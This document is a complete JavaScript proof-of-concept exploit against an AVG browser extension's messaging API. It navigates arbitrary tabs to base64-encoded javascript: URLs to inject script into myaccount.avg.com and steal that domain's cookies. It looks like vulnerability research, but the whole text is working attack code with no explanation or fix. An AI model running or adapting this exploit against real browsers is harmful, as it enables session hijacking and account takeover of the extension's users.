<script>
|
// Secret we append to our target window hash.
|
var tgtsecret = Math.random().toString(36).substring(8);
|
// Secret we append to the host window hash.
|
var hstsecret = Math.random().toString(36).substring(8);
|
// Target cookie.
|
var tgtcookie = null;
|
|
// This is the core vulnerability, avg add a javascript api that includes the
|
// ability to navigate arbitrary tabs.
|
function avgNavigate(url, newtab, tabid)
|
{
|
var message = {
|
origin: "web",
|
action: "navigate",
|
data: {
|
url: url,
|
isNewTab: newtab,
|
},
|
};
|
|
if (newtab == false) {
|
message.data.tabid = tabid;
|
}
|
|
window.postMessage(message, "*");
|
}
|
|
// Search for a tab with document.hash set to secret, and then inject specified
|
// script.
|
function injectInTabWithSecret(secret, func)
|
{
|
var payload = "javascript:document.location.hash.endsWith('"
|
+ secret
|
+ "')?eval(atob('"
|
+ btoa(func)
|
+ "')):false;"
|
|
console.log(payload);
|
|
for (i = 0; i < 0x100; i++) {
|
avgNavigate(payload, false, i);
|
}
|
}
|
|
function retrieveCookie()
|
{
|
injectInTabWithSecret(hstsecret, "tgtcookie='" + document.cookie + "';");
|
injectInTabWithSecret(hstsecret, "cookieFound();");
|
setInterval(10000, window.close);
|
}
|
|
function cookieFound()
|
{
|
document.write("Discovered Cookie: " + tgtcookie + "<br>");
|
}
|
|
// Adjust my hash so target can find me.
|
window.location.hash = hstsecret;
|
|
// Create target domain.
|
avgNavigate("https://myaccount.avg.com/#" + tgtsecret, true, -1);
|
|
// Inject some utility functions.
|
injectInTabWithSecret(tgtsecret, avgNavigate);
|
injectInTabWithSecret(tgtsecret, injectInTabWithSecret);
|
|
// Let target know where we are.
|
injectInTabWithSecret(tgtsecret, "hstsecret='" + hstsecret + "';");
|
|
// Steal cookie
|
injectInTabWithSecret(tgtsecret, retrieveCookie);
|
injectInTabWithSecret(tgtsecret, "retrieveCookie()");
|
|
</script>
|